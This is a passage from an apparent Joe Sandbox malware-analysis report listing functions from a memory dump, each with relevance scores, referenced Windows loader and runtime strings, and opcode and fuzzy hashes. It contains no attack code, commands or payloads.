Instruction ID: ff73fe21084d284c0d17c8869232e5abf11b085da36d0efac4fd6b2f1f53da5d
Opcode Fuzzy Hash: 3dfe69e85f376dcf869f351b7fb54440321b62108840dcaccf9630dfe9131626
Instruction Fuzzy Hash: 07F0C2B5640308BBE724EB8CDD56FA93BACFB50B54F14006EFB04A7292D2F4A900C695

Function 01A803E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01AD4D8A

Strings

#%u, xrefs: 01AD4D82

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID: ___swprintf_l
String ID: #%u
API String ID: 48624451-232158463
Opcode ID: fb4146cc28c33fd6b552103bd06d729235aa594f75dc5b90f720844f1312dcbd
Instruction ID: 93cdba8fee5c8ada29b924dc2711587d2a74878cc4092d19e8347745d9e35991
Opcode Fuzzy Hash: fb4146cc28c33fd6b552103bd06d729235aa594f75dc5b90f720844f1312dcbd
Instruction Fuzzy Hash: 2C713A71A0154A9FDB01DFA8CA90BAEB7F8FF18704F144065E905E7252EB34ED05CB60

Function 01A7A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON

Download Yara Rule

Strings

LdrResSearchResource Exit, xrefs: 01A7AA25
LdrResSearchResource Enter, xrefs: 01A7AA13

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
API String ID: 0-4066393604
Opcode ID: 9aea7beb9a50357cf1aeac2219ddcce23d03266319873032d2fa0d1f35d8059e
Instruction ID: 0e1bdfb0f12d25e9cda97428f9dd282fe27788381d9cf141a3a493da078fed3a
Opcode Fuzzy Hash: 9aea7beb9a50357cf1aeac2219ddcce23d03266319873032d2fa0d1f35d8059e
Instruction Fuzzy Hash: A7E18071E04609AFEF22DF99CD80BAEBBB9BF58310F184466E902E7251D774DA40CB51

Function 01B3A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON

Download Yara Rule

Strings

`, xrefs: 01B3A44B
`, xrefs: 01B3A551

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction ID: 660362ce759dc425aabeae970691f5a8ae157eb7dcf897c232baad32e599bc8b
Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction Fuzzy Hash: A9C1BF312043429BEB29CE28C881B6BBBE5EFD4314F284A6DF6D6CB290D775D515CB81

Function 01AEE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON

Download Yara Rule

Strings

Legacy, xrefs: 01AEE75A
UEFI, xrefs: 01AEE751

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: bab16e8fa61563a7c6347eca4b1a216332eba6e57c91c02eac3312e7f38b0ed1
Instruction ID: 16075adf8b046c672d09c6d7ceb2196c4292eddf564d3a6b4fe783c086ffed61
Opcode Fuzzy Hash: bab16e8fa61563a7c6347eca4b1a216332eba6e57c91c02eac3312e7f38b0ed1
Instruction Fuzzy Hash: 2F614BB1E402199FDB15DFA9C984BAEBBF9FB48700F14406DEA49EB251D731AD40CB50

Function 01B143D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON

Download Yara Rule

Strings

MUI, xrefs: 01B14525
@, xrefs: 01B14437

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID: @$MUI
API String ID: 0-17815947
Opcode ID: 381d793cad35811352fe08c09351038e005b6939abfefe47d62c5e371644e19b
Instruction ID: ab930ad9921f439bf30f745a305d3ca02c5db971af7477cb6753a726720bee90
Opcode Fuzzy Hash: 381d793cad35811352fe08c09351038e005b6939abfefe47d62c5e371644e19b
Instruction Fuzzy Hash: 31514AB1E0021DAFDF15DFA9CD80AEEBBBCEB44754F10056AE611B7284D7309A05CB60

Function 01A704E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON

Download Yara Rule

Strings

kLsE, xrefs: 01A70540
TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 01A7063D

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 0-2547482624
Opcode ID: 1bbda087afe6d2d57946aa3e6863d64947e8fa7bbe59dcff140b3570e4b7adbf
Instruction ID: b5ee67995d8a10aac4501aed32517e08025b59a7f14efcf30acf94087ba67cba
Opcode Fuzzy Hash: 1bbda087afe6d2d57946aa3e6863d64947e8fa7bbe59dcff140b3570e4b7adbf
Instruction Fuzzy Hash: E451C2716047429FD724DF78CA406A7BBE4AF86304F10883EF6D987241E774E645CB91

Function 01A7A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

RtlpResUltimateFallbackInfo Enter, xrefs: 01A7A2FB
RtlpResUltimateFallbackInfo Exit, xrefs: 01A7A309

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
API String ID: 0-2876891731
Opcode ID: 10089623ccf77fe0bc1fcaf2ad0bb2075c1ad8977192ceec4602092579394ed3
Instruction ID: b4419c00e613f586e5333153f08698d619d51bed32a3f9642dd6c8d18023ba3c
Opcode Fuzzy Hash: 10089623ccf77fe0bc1fcaf2ad0bb2075c1ad8977192ceec4602092579394ed3
Instruction Fuzzy Hash: 8D41C239A04A49EFEB11DF59C840B6E7BB4FF84700F1880AAE915DB291E3B5DA40CB50

Function 01AAA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON

Download Yara Rule

Strings

Threadpool!, xrefs: 01AAA5E9
Cleanup Group, xrefs: 01AAA5E4

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID: InitializeThunk
String ID: Cleanup Group$Threadpool!
API String ID: 2994545307-4008356553
Opcode ID: bd938ca00f2be17794213d3465f701dc582909306e79462e8f1c4f1389e91138
Instruction ID: c585209ace61215bf615eaadc3506de40d9b52f2e3bd36257170cbd7d920f9ea
Opcode Fuzzy Hash: bd938ca00f2be17794213d3465f701dc582909306e79462e8f1c4f1389e91138
Instruction Fuzzy Hash: B401DCB2640740AFD321DF24CE45B26B7E8E794B25F04893AF648C7190E374E804CB46

Function 01A7C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON

Download Yara Rule

Strings

MUI, xrefs: 01A7C8C3, 01A7CA40

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID: MUI
API String ID: 0-1339004836
Opcode ID: 59bc5333c0a9f9e089fd83c51f67785c0b9637346651656209ab67873b570b71
Instruction ID: 42688054a99d09ccc081168b570cafc69808e806f75b855d770cd355cc65a927
Opcode Fuzzy Hash: 59bc5333c0a9f9e089fd83c51f67785c0b9637346651656209ab67873b570b71
Instruction Fuzzy Hash: 4F826C75E002199FEB25CFA9CD80BEDBBB5BF48320F148169E919AB355D7309E81CB50

Function 01AF6420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

Strings

, xrefs: 01AF65C1

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: e1d6979fe9fbacec5e525c0545fe25bd7660e00441c8c7e080bc66d59c395597
Instruction ID: 216418d6db5a23a78db11edf88883b06aa175d7f440a69c452f2e3c3deb515c9
Opcode Fuzzy Hash: e1d6979fe9fbacec5e525c0545fe25bd7660e00441c8c7e080bc66d59c395597
Instruction Fuzzy Hash: 7C9161B1A00219AFEF21DBA5CD85FAE7BB9EF15B50F100059F704BB191D775A904CBA0

Function 01B1E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON

Download Yara Rule

Strings

, xrefs: 01B1E1FA

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 738f59db34bac6d688063f0b1dcb15168a99a076c17e032eb629d7e33fb4f396
Instruction ID: e4c53a3cc39d5a01bbb8562798d6d30cbd036b8a01aec45e0eaa4a8b750568c9
Opcode Fuzzy Hash: 738f59db34bac6d688063f0b1dcb15168a99a076c17e032eb629d7e33fb4f396
Instruction Fuzzy Hash: CA91DD72900209AEDF2BABA5ED94FEFBBB9EF45740F510069F901A7250DB34D901CB90

Function 01AAA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

GlobalTags, xrefs: 01AE67C9

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID: GlobalTags
API String ID: 0-1106856819
Opcode ID: f96957a0afe8a22cf35f8666d887f13c8c2875929cc5f75c12a3186575f52c72
Instruction ID: 202bf62100348b3892ec3be2a2a7ee3d770b8d61dcdea7d3ddb432b8e6f33ae2
Opcode Fuzzy Hash: f96957a0afe8a22cf35f8666d887f13c8c2875929cc5f75c12a3186575f52c72
Instruction Fuzzy Hash: 95718EB5E0020ADFDF29CF9CC594AADBBF2BF68710F14852EE909A7241E7359941CB50

Function 01B14978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

.mui, xrefs: 01B14A7F

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID: .mui
API String ID: 0-1199573805
Opcode ID: 2dc812ea45d1f26f2d30b67d914ce3ae9ab107e5bf8dbab1b90492287e832b78
Instruction ID: 9ba637d523fd69917b3fe200e40da345cf7920f8cf571b529439632fae99b56e
Opcode Fuzzy Hash: 2dc812ea45d1f26f2d30b67d914ce3ae9ab107e5bf8dbab1b90492287e832b78
Instruction Fuzzy Hash: 8951B172D1022ADFDF18DF99D940AAEBBB4FF05B10F4641A9EA11BB244D7348901CBA4

Function 01A8E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

EXT-, xrefs: 01A8E6A4

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID: EXT-
API String ID: 0-1948896318
Opcode ID: 58741bb9c9a1b7db959f5955c193d70b66c985802f544ec2d2d3dceb319817b6
Instruction ID: dbede6525eed3af9c14ea32322622f107efce44c1a89f6e2d3323b9f8c88d784
Opcode Fuzzy Hash: 58741bb9c9a1b7db959f5955c193d70b66c985802f544ec2d2d3dceb319817b6
Instruction Fuzzy Hash: E7417172608352EBD711FB75C940B6BBBE8AF88B14F44092DFA94E7180E674D904C797

Function 01AEC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

BinaryHash, xrefs: 01AEC77F

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: 7bb18375543a5f2ef4a10ee398d3b49415ae86cc7dbc03e21b565a6ad23e5587
Instruction ID: 7986012095df53f1082702e435c2d8120df9a718d1b7883605a45f91faceec6d
Opcode Fuzzy Hash: 7bb18375543a5f2ef4a10ee398d3b49415ae86cc7dbc03e21b565a6ad23e5587
Instruction Fuzzy Hash: 8C4142F1D0012DABDB21DB64CD84FDEB7BCAB55724F0045A5EB08AB141DB709E898FA4

Function 01B06B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON

Download Yara Rule

Strings

#, xrefs: 01B06B91

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 91d24f829d0de7fa1a559ef00dcd39abb878b73c9686216a0f49576e04b3a490
Instruction ID: 8c55a3f6b5ac91c0a13658f769ed679e119801ed171cabaec92d8cdea48a282b
Opcode Fuzzy Hash: 91d24f829d0de7fa1a559ef00dcd39abb878b73c9686216a0f49576e04b3a490
Instruction Fuzzy Hash: 9D310631A007599BEB37DB69C850BEE7FB8EF05704F1440A8E941AB2C2DB75D855CB50

Function 01AECA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

BinaryName, xrefs: 01AECAA2

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: 987efdd3941206ac95276914179856b5e77c419d58c77b0fb9e2a5633e33321f
Instruction ID: 2a2cb35a12a993781c9a5a8b13f98061ce9d493722c351af03c2986db0f6a675
Opcode Fuzzy Hash: 987efdd3941206ac95276914179856b5e77c419d58c77b0fb9e2a5633e33321f
Instruction Fuzzy Hash: 8B31F176900515AFEF15DB59C959EABBBB4EB80720F014129E911AB250E730AE04DBE0

Function 01AF892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON

Download Yara Rule

Strings

AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 01AF895E

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
API String ID: 0-702105204
Opcode ID: 36c0601c11e17e3675f7ce91c1bb706b39b01d220b018bed0ac8714fd53a58ac
Instruction ID: e251294446c0c6bdbbc391d4ec56ce5494fcfb038868244fbdd992fbf3d2e6ce
Opcode Fuzzy Hash: 36c0601c11e17e3675f7ce91c1bb706b39b01d220b018bed0ac8714fd53a58ac
Instruction Fuzzy Hash: E7012632300201AFE7356BDACDC4B5A7B69FFA5294B08102CF741871A1CF38A890C796

Function 01B12000 Relevance: .8, Instructions: 757COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08f35bb8e8d7cfbd5869fd06903055e59015ce9737026aac7298576bb4e11cc7
Instruction ID: a2795a6dc2c51cefccb0bd4288a186cf75634d9daf21e6b5d3e708bd12ca1521
Opcode Fuzzy Hash: 08f35bb8e8d7cfbd5869fd06903055e59015ce9737026aac7298576bb4e11cc7
Instruction Fuzzy Hash: 5B42F9716083419FDB19DF68C890A6FBBE5FF84300FA609ADFA8187254D731D945CB52

Function 01B08158 Relevance: .6, Instructions: 617COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfb63dc0579e02116653f16f3d87823d79ce4b6299ebb57e39ff0ce7219df843
Instruction ID: e089778a0ed8cc1a6dc8d517efd455ab64dc982a116087463de884c6ec0c9fa1
Opcode Fuzzy Hash: bfb63dc0579e02116653f16f3d87823d79ce4b6299ebb57e39ff0ce7219df843
Instruction Fuzzy Hash: 82424E75E002198FEB25CF69C881BADBBF5FF48310F158199E949EB282D7349A85CF50

Function 01A82840 Relevance: .6, Instructions: 605COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0b0fda2a2fa0acf1101bc9c609dabfee7714333a684436bf6b138ee04dee066
Instruction ID: 6f872436c1b58080edab620c31036b180bb2636235dcfceb5c5e3499ac97600e
Opcode Fuzzy Hash: b0b0fda2a2fa0acf1101bc9c609dabfee7714333a684436bf6b138ee04dee066
Instruction Fuzzy Hash: C332E070A00B558FEB29CF69C9447BEBBF2BF84704F28411EE58B9B285D735A841CB50

Function 01B1A118 Relevance: .6, Instructions: 591COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fb1dbd15a22fe1b1e1418d47a008a2af16d35377b4b4721cf4b0c5745839e9a
Instruction ID: a3b2cb637b1ed21958b426ece926349d2ec105b0c6ac2fc644821fbac6aa48f5
Opcode Fuzzy Hash: 6fb1dbd15a22fe1b1e1418d47a008a2af16d35377b4b4721cf4b0c5745839e9a
Instruction Fuzzy Hash: A022A1702066D18AEB29CF39C094372BBF1EF45300F9A85D9E9968B28ED735F551CB60

Function 01A94A35 Relevance: .4, Instructions: 423COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
Instruction ID: f5e491fcc724f89b94c40cfe8baf78456ce69cecbbf0100be2f3e3b02a609f12
Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
Instruction Fuzzy Hash: 14F16375E0061A9FDF15CF99C680BAEBBF5BF48714F098129E905AB344E734D882CB60

Function 01B0892B Relevance: .4, Instructions: 386COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd27dbb58c85d7113938546702131caf60bc628e4cd496f20e15a80dc7404ce1
Instruction ID: 5bb057eada4ac5dcc9bc664d87a3564d5afdc1044c321b51d15c871f3e1bf16a
Opcode Fuzzy Hash: bd27dbb58c85d7113938546702131caf60bc628e4cd496f20e15a80dc7404ce1
Instruction Fuzzy Hash: 67D1F371E0060A8BDF1ACF58C841AFEBBF1FF88314F1882A9D555E7281D735EA058B60

Function 01A765D0 Relevance: .4, Instructions: 383COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: daee6ffdac8aa775123ad2b7d1be6c76b0aa47e0fc94498e0ebe4c75f582a0af
Instruction ID: 8d611039badc6ebefb0a97582461c6ec4386718fac564c0d3668f4f8358cb634
Opcode Fuzzy Hash: daee6ffdac8aa775123ad2b7d1be6c76b0aa47e0fc94498e0ebe4c75f582a0af
Instruction Fuzzy Hash: 14E18E71608742CFD715DF28C990A6ABBF0FF89314F04896DE99987351EB31EA05CB92

Function 01A68397 Relevance: .4, Instructions: 380COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d04bbe77125964b88299276a48fd1280c38af14795dfbc4402be3bd92ce62c73
Instruction ID: 73baf895c18b6a60cada764af3d0a92cd78b8041f39d00e4abcfa313d6406256
Opcode Fuzzy Hash: d04bbe77125964b88299276a48fd1280c38af14795dfbc4402be3bd92ce62c73
Instruction Fuzzy Hash: 02D10571A0030A9BDF14DF68C981ABA77BDFF64744F08462DE916DB281E738E950CB60

Function 01AF8243 Relevance: .3, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
Instruction ID: 74068e889e8a3d42837ed2bd18d91ff48d5a484562970352e81b46e39f57d97f
Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
Instruction Fuzzy Hash: 68B16E75A00709AFDF24DBD9C940AABBBB9EF84304F14446DBB52A7794DB38E905CB10

Function 01A80535 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
Instruction ID: 0462f61d7ab8d87cb358e446fae9255f4ebdf4c672b946f79c410814c3e405f9
Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
Instruction Fuzzy Hash: 17B14A31600A46AFDB25EB68C950BBEBBF6AF48300F1845A5E652D7391DB30ED45CB90

Function 01A783C0 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 837b4c7f91a121ada5eb966b4c66206b700a4597aacb11441d5535f9193502c5
Instruction ID: fde200acd3ce280d7098a3179e6c2cf8e19bf73971af879ceed96face5eec152
Opcode Fuzzy Hash: 837b4c7f91a121ada5eb966b4c66206b700a4597aacb11441d5535f9193502c5
Instruction Fuzzy Hash: A8C13A74508341CFD764CF19C894BABB7E5BF98304F44496DE98A87291E778EA08CF92

Function 01A6C427 Relevance: .3, Instructions: 280COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: feeb31d2905ba9a946207d9c78471dbd680b9de9b530234183a7b2294d228c3c
Instruction ID: aa0dfd81339e56b3274459881bc87c820450ae46d65387ff6e3ab8da756f0baa
Opcode Fuzzy Hash: feeb31d2905ba9a946207d9c78471dbd680b9de9b530234183a7b2294d228c3c
Instruction Fuzzy Hash: BEB18270A0026A8BDB25DF68C990BB9B3F5EF44750F0485EAD54AE7245EB30DDC5CB24

Function 01A9E5E7 Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 016491cfca77c792cf0e848c7932ade5f018292b9731c4483ed5a50a85e517ca
Instruction ID: 52c0fec4d02288cc581c61264aaa0d2f577f5e0c793f75370fea8dce541b5e86
Opcode Fuzzy Hash: 016491cfca77c792cf0e848c7932ade5f018292b9731c4483ed5a50a85e517ca
Instruction Fuzzy Hash: 8EA10631E00655AFEF21DB98C944BAEBBF4AF04754F090125EA12AB2D2D774AD81CBD1

Function 01AB0185 Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cf552d54652468ca5b0da8138fcf722cd3486d6d05094c52ec9632f47fbe7b3
Instruction ID: efbf5afb6d57a742c806d76a3c143a3faea0274066d4512a6a95d3ff3347b8ea
Opcode Fuzzy Hash: 8cf552d54652468ca5b0da8138fcf722cd3486d6d05094c52ec9632f47fbe7b3
Instruction Fuzzy Hash: BAA1AD70A017569BDB25CF69C6D4BABBBF9FF54314F04402AEA4597283EB38E805CB50

Function 01B44500 Relevance: .3, Instructions: 275COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92e38ba8fec5ba956b83fc84bc15b8ac61b50302881c717291bb31e3d5ab805e
Instruction ID: c4e64540333a4d9b045a1ada04e0c97fb6cbe0e8ec1c27f8eb3280c6efee92f0
Opcode Fuzzy Hash: 92e38ba8fec5ba956b83fc84bc15b8ac61b50302881c717291bb31e3d5ab805e
Instruction Fuzzy Hash: 6EA10172A00202DFDB19DF28C980B6AB7E9FF58704F0085A9F585DB661D334ED11CB91

Function 01B42B57 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
